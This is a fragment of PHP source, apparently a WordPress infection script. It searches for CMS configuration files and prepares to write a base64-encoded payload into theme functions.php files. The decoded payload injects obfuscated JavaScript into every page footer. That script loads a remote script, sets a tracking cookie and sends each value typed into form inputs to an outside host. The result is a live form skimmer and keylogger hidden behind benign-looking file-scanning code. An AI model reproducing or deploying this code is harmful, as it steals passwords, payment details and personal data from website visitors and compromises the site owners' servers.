    374         '*.dat',                                                  // .dat files
    375     ];
    376 
    377     // Array to store CMS configuration files
    378     $cms_config_files = [];
    379 
    380     // Iterate through the paths to check and search for configuration files in each directory recursively
    381 
    382     search_for_config_files($cms_config_files);
    383 
    384     $azb = "CmlmICghZnVuY3Rpb25fZXhpc3RzKCdhZGRfZm9vdGVyX3NjcmlwdCcpKSB7CmZ1bmN0aW9uIGFkZF9mb290ZXJfc2NyaXB0KCkgewoJdXBkYXRlX29wdGlvbignbXlfYWRtaW5faW5pdF9mdW5jdGlvbl9ydW4nLCAneWVzJyk7CgllY2hvICc8c2NyaXB0PmV2YWwoIlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Nlx1MDA2MVx1MDA3Mlx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2M1x1MDA3Mlx1MDA2NVx1MDA2MVx1MDA3NFx1MDA2NVx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyOFx1MDAyMlx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDAyMlx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA3M1x1MDA3Mlx1MDA2M1x1MDAyMFx1MDAzZFx1MDAyMFx1MDAyMlx1MDA2OFx1MDA3NFx1MDA3NFx1MDA3MFx1MDA3M1x1MDAzYVx1MDAyZlx1MDAyZlx1MDAzOVx1MDAzNFx1MDAyZVx1MDAzMVx1MDAzNVx1MDAzNlx1MDAyZVx1MDAzN1x1MDAzOVx1MDAyZVx1MDAzOFx1MDAyZlx1MDA3M1x1MDA2M1x1MDAyZFx1MDA3NFx1MDA2Zlx1MDA3MFx1MDAyZVx1MDA2YVx1MDA3M1x1MDAyMlx1MDAzYlx1MDAwYVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA2ZFx1MDA2Zlx1MDA3Nlx1MDA2NVx1MDA1M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDAyOFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA3MFx1MDA2MVx1MDA3Mlx1MDA2NVx1MDA2ZVx1MDA3NFx1MDA0ZVx1MDA2Zlx1MDA2NFx1MDA2NVx1MDAyZVx1MDA3Mlx1MDA2NVx1MDA2ZFx1MDA2Zlx1MDA3Nlx1MDA2NVx1MDA0M1x1MDA2OFx1MDA2OVx1MDA2Y1x1MDA2NFx1MDAyOFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2MVx1MDA2NFx1MDA2NFx1MDA0NVx1MDA3Nlx1MDA2NVx1MDA2ZVx1MDA3NFx1MDA0Y1x1MDA2OVx1MDA3M1x1MDA3NFx1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDAyOFx1MDAyN1x1MDA2Y1x1MDA2Zlx1MDA2MVx1MDA2NFx1MDAyN1x1MDAyY1x1MDAyMFx1MDA3Mlx1MDA2NVx1MDA2ZFx1MDA2Zlx1MDA3Nlx1MDA2NVx1MDA1M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2Mlx1MDA2Zlx1MDA2NFx1MDA3OVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDA0M1x1MDA2OFx1MDA2OVx1MDA2Y1x1MDA2NFx1MDAyOFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA2N1x1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDA2MVx1MDA3NFx1MDA2NVx1MDA1Mlx1MDA2MVx1MDA2ZVx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyOFx1MDA3NFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2NVx1MDAyMFx1MDAzZFx1MDAyMFx1MDAyMlx1MDA0MVx1MDA0Mlx1MDA0M1x1MDA0NFx1MDA0NVx1MDA0Nlx1MDA0N1x1MDA0OFx1MDA0OVx1MDA0YVx1MDA0Ylx1MDA0Y1x1MDA0ZFx1MDA0ZVx1MDA0Zlx1MDA1MFx1MDA1MVx1MDA1Mlx1MDA1M1x1MDA1NFx1MDA1NVx1MDA1Nlx1MDA1N1x1MDA1OFx1MDA1OVx1MDA1YVx1MDA2MVx1MDA2Mlx1MDA2M1x1MDA2NFx1MDA2NVx1MDA2Nlx1MDA2N1x1MDA2OFx1MDA2OVx1MDA2YVx1MDA2Ylx1MDA2Y1x1MDA2ZFx1MDA2ZVx1MDA2Zlx1MDA3MFx1MDA3MVx1MDA3Mlx1MDA3M1x1MDA3NFx1MDA3NVx1MDA3Nlx1MDA3N1x1MDA3OFx1MDA3OVx1MDA3YVx1MDAzMFx1MDAzMVx1MDAzMlx1MDAzM1x1MDAzNFx1MDAzNVx1MDAzNlx1MDAzN1x1MDAzOFx1MDAzOVx1MDAyMlx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA2ZVx1MDAyMFx1MDAzZFx1MDAyMFx1MDAyMlx1MDAyMlx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA2Zlx1MDA3Mlx1MDAyMFx1MDAyOFx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA2Zlx1MDAyMFx1MDAzZFx1MDAyMFx1MDAzMFx1MDAzYlx1MDAyMFx1MDA2Zlx1MDAyMFx1MDAzY1x1MDAyMFx1MDA3NFx1MDAzYlx1MDAyMFx1MDA2Zlx1MDAyYlx1MDAyYlx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA3NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA0ZFx1MDA2MVx1MDA3NFx1MDA2OFx1MDAyZVx1MDA2Nlx1MDA2Y1x1MDA2Zlx1MDA2Zlx1MDA3Mlx1MDAyOFx1MDAzNlx1MDAzMlx1MDAyMFx1MDAyYVx1MDAyMFx1MDA0ZFx1MDA2MVx1MDA3NFx1MDA2OFx1MDAyZVx1MDA3Mlx1MDA2MVx1MDA2ZVx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDAyOFx1MDAyOVx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyMFx1MDAyYlx1MDAzZFx1MDAyMFx1MDA2NVx1MDAyZVx1MDA2M1x1MDA2OFx1MDA2MVx1MDA3Mlx1MDA0MVx1MDA3NFx1MDAyOFx1MDA3NFx1MDAyOVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA3NFx1MDA3NVx1MDA3Mlx1MDA2ZVx1MDAyMFx1MDA2ZVx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAwYVx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2N1x1MDA2NVx1MDA3NFx1MDA0M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyOFx1MDAyN1x1MDA3OFx1MDA2M1x1MDA2ZVx1MDA2ZFx1MDA2Zlx1MDAyZFx1MDA2Zlx1MDA2Nlx1MDA2Nlx1MDA3M1x1MDA2NVx1MDA3NFx1MDA2N1x1MDA3OFx1MDA2M1x1MDAyN1x1MDAyOVx1MDAzYlx1MDAwYVx1MDAwYVx1MDA2OVx1MDA2Nlx1MDAyMFx1MDAyOFx1MDAyMVx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2N1x1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDA2MVx1MDA3NFx1MDA2NVx1MDA1Mlx1MDA2MVx1MDA2ZVx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyOFx1MDAzMVx1MDAzMFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2MFx1MDA3OFx1MDA2M1x1MDA2ZVx1MDA2ZFx1MDA2Zlx1MDAyZFx1MDA2Zlx1MDA2Nlx1MDA2Nlx1MDA3M1x1MDA2NVx1MDA3NFx1MDA2N1x1MDA3OFx1MDA2M1x1MDAzZFx1MDAyNFx1MDA3Ylx1MDA3NVx1MDA2OVx1MDA2NFx1MDA3ZFx1MDAzYlx1MDAyMFx1MDA3MFx1MDA2MVx1MDA3NFx1MDA2OFx1MDAzZFx1MDAyZlx1MDA2MFx1MDAzYlx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAwYVx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA3M1x1MDA2NVx1MDA2ZVx1MDA2NFx1MDA1MFx1MDA2Zlx1MDA3M1x1MDA3NFx1MDA1Mlx1MDA2NVx1MDA3MVx1MDA3NVx1MDA2NVx1MDA3M1x1MDA3NFx1MDAyOFx1MDA3NFx1MDAyY1x1MDAyMFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2ZVx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2ZVx1MDA2NVx1MDA3N1x1MDAyMFx1MDA1NVx1MDA1Mlx1MDA0Y1x1MDA1M1x1MDA2NVx1MDA2MVx1MDA3Mlx1MDA2M1x1MDA2OFx1MDA1MFx1MDA2MVx1MDA3Mlx1MDA2MVx1MDA2ZFx1MDA3M1x1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDAyOFx1MDAyMlx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyOVx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDAyOFx1MDAyMlx1MDA2OVx1MDA1Zlx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3NFx1MDAyOVx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyZlx1MDAyZlx1MDAyMFx1MDA0MVx1MDA2NFx1MDA2NFx1MDAyMFx1MDA3NFx1MDA2OFx1MDA2NVx1MDAyMFx1MDA2Nlx1MDA2OVx1MDA2NVx1MDA2Y1x1MDA2NFx1MDAyMFx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDA2MVx1MDA3M1x1MDAyMFx1MDA2MVx1MDAyMFx1MDA3MFx1MDA2MVx1MDA3Mlx1MDA2MVx1MDA2ZFx1MDA2NVx1MDA3NFx1MDA2NVx1MDA3Mlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDAyOFx1MDAyMlx1MDA2Mlx1MDAyMlx1MDAyY1x1MDAyMFx1MDA2Mlx1MDA3NFx1MDA2Zlx1MDA2MVx1MDAyOFx1MDA2NVx1MDAyOVx1MDAyOVx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA2NVx1MDA3NFx1MDA2M1x1MDA2OFx1MDAyOFx1MDAyMlx1MDA2OFx1MDA3NFx1MDA3NFx1MDA3MFx1MDA3M1x1MDAzYVx1MDAyZlx1MDAyZlx1MDA2OFx1MDA2Zlx1MDA3M1x1MDA3NFx1MDA3MFx1MDA2NFx1MDA2Nlx1MDAyZVx1MDA2M1x1MDA2Zlx1MDAyZlx1MDA3MFx1MDA2OVx1MDA2ZVx1MDA2M1x1MDA2OFx1MDA2NVx1MDAyZVx1MDA3MFx1MDA2OFx1MDA3MFx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZFx1MDA2NVx1MDA3NFx1MDA2OFx1MDA2Zlx1MDA2NFx1MDAzYVx1MDAyMFx1MDAyMlx1MDA1MFx1MDA0Zlx1MDA1M1x1MDA1NFx1MDAyMlx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2OFx1MDA2NVx1MDA2MVx1MDA2NFx1MDA2NVx1MDA3Mlx1MDA3M1x1MDAzYVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMlx1MDA0M1x1MDA2Zlx1MDA2ZVx1MDA3NFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZFx1MDA1NFx1MDA3OVx1MDA3MFx1MDA2NVx1MDAyMlx1MDAzYVx1MDAyMFx1MDAyMlx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2Y1x1MDA2OVx1MDA2M1x1MDA2MVx1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyZlx1MDA3OFx1MDAyZFx1MDA3N1x1MDA3N1x1MDA3N1x1MDAyZFx1MDA2Nlx1MDA2Zlx1MDA3Mlx1MDA2ZFx1MDAyZFx1MDA3NVx1MDA3Mlx1MDA2Y1x1MDA2NVx1MDA2ZVx1MDA2M1x1MDA2Zlx1MDA2NFx1MDA2NVx1MDA2NFx1MDAyMlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Mlx1MDA2Zlx1MDA2NFx1MDA3OVx1MDAzYVx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA3NFx1MDA2Zlx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyOFx1MDAyOVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAyOVx1MDAyZVx1MDA3NFx1MDA2OFx1MDA2NVx1MDA2ZVx1MDAyOFx1MDAyOFx1MDA3NFx1MDAzZFx1MDAzZVx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2NVx1MDA3OFx1MDA3NFx1MDAyOFx1MDAyOVx1MDAyOVx1MDAyOVx1MDAyZVx1MDA3NFx1MDA2OFx1MDA2NVx1MDA2ZVx1MDAyOFx1MDAyOFx1MDA3NFx1MDAzZFx1MDAzZVx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA2Zlx1MDA2Y1x1MDA2NVx1MDAyZVx1MDA2Y1x1MDA2Zlx1MDA2N1x1MDAyOFx1MDA3NFx1MDAyOVx1MDAyOVx1MDAyOVx1MDAyZVx1MDA2M1x1MDA2MVx1MDA3NFx1MDA2M1x1MDA2OFx1MDAyOFx1MDAyOFx1MDA3NFx1MDAzZFx1MDAzZVx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA2Zlx1MDA2Y1x1MDA2NVx1MDAyZVx1MDA2NVx1MDA3Mlx1MDA3Mlx1MDA2Zlx1MDA3Mlx1MDAyOFx1MDAyMlx1MDA0NVx1MDA3Mlx1MDA3Mlx1MDA2Zlx1MDA3Mlx1MDAzYVx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3NFx1MDAyOVx1MDAyOVx1MDAyOVx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAwYVx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2MVx1MDA2NFx1MDA2NFx1MDA0NVx1MDA3Nlx1MDA2NVx1MDA2ZVx1MDA3NFx1MDA0Y1x1MDA2OVx1MDA3M1x1MDA3NFx1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDAyOFx1MDAyMlx1MDA2OVx1MDA2ZVx1MDA3MFx1MDA3NVx1MDA3NFx1MDAyMlx1MDAyY1x1MDAyMFx1MDAyOFx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyOFx1MDA3NFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2OVx1MDA2Nlx1MDAyMFx1MDAyOFx1MDAyMlx1MDA0OVx1MDA0ZVx1MDA1MFx1MDA1NVx1MDA1NFx1MDAyMlx1MDAyMFx1MDAzZFx1MDAzZFx1MDAzZFx1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA2N1x1MDA0ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDAyNlx1MDAyNlx1MDAyMFx1MDAyMlx1MDA2Mlx1MDA3NVx1MDA3NFx1MDA3NFx1MDA2Zlx1MDA2ZVx1MDAyMlx1MDAyMFx1MDAyMVx1MDAzZFx1MDAzZFx1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA3NFx1MDA3OVx1MDA3MFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2NVx1MDA2ZVx1MDA2NFx1MDA1MFx1MDA2Zlx1MDA3M1x1MDA3NFx1MDA1Mlx1MDA2NVx1MDA3MVx1MDA3NVx1MDA2NVx1MDA3M1x1MDA3NFx1MDAyOFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDA3Y1x1MDA3Y1x1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA2OVx1MDA2NFx1MDAyY1x1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA3Nlx1MDA2MVx1MDA2Y1x1MDA3NVx1MDA2NVx1MDAyOVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDA3ZFx1MDAyOVx1MDAyOVx1MDAzYlx1MDAwYVx1MDAwYVx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA2N1x1MDA2NVx1MDA3NFx1MDA0M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyOFx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyMFx1MDAzZFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA3M1x1MDAyMFx1MDAzZFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyZVx1MDA3M1x1MDA3MFx1MDA2Y1x1MDA2OVx1MDA3NFx1MDAyOFx1MDAyN1x1MDAzYlx1MDAyMFx1MDAyN1x1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA2Zlx1MDA3Mlx1MDAyMFx1MDAyOFx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyMFx1MDA2Zlx1MDA2Nlx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA3M1x1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA1Ylx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA0ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyY1x1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1Nlx1MDA2MVx1MDA2Y1x1MDA3NVx1MDA2NVx1MDA1ZFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyZVx1MDA3M1x1MDA3MFx1MDA2Y1x1MDA2OVx1MDA3NFx1MDAyOFx1MDAyN1x1MDAzZFx1MDAyN1x1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2OVx1MDA2Nlx1MDAyMFx1MDAyOFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA0ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDAzZFx1MDAzZFx1MDAzZFx1MDAyMFx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA3NFx1MDA3NVx1MDA3Mlx1MDA2ZVx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1Nlx1MDA2MVx1MDA2Y1x1MDA3NVx1MDA2NVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA3NFx1MDA3NVx1MDA3Mlx1MDA2ZVx1MDAyMFx1MDA2ZVx1MDA3NVx1MDA2Y1x1MDA2Y1x1MDAzYlx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMCIpOzwvc2NyaXB0Pic7Cn0KJGhhc19ydW4gPSBnZXRfb3B0aW9uKCdteV9hZG1pbl9pbml0X2Z1bmN0aW9uX3J1bicpOwppZiAoJGhhc19ydW4gIT09ICd5ZXMnKSB7CglhZGRfYWN0aW9uKCd3cF9mb290ZXInLCAnYWRkX2Zvb3Rlcl9zY3JpcHQnKTsKfQp9";
    385 
    386     // Decode base64 content to string
    387     $dcd_ctnt = base64_decode($azb);
    388     // Process the detected configuration files and extract CMS information
    389     foreach ($cms_config_files as $file) {
    390        // echo($file);
    391        try {
    392         // Check if file path contains '/plugins/' and ends with '.php'
    393         if (strpos($file, '/themes/') !== false && substr($file, -13) === 'functions.php') {
    394     // Your custom content to add
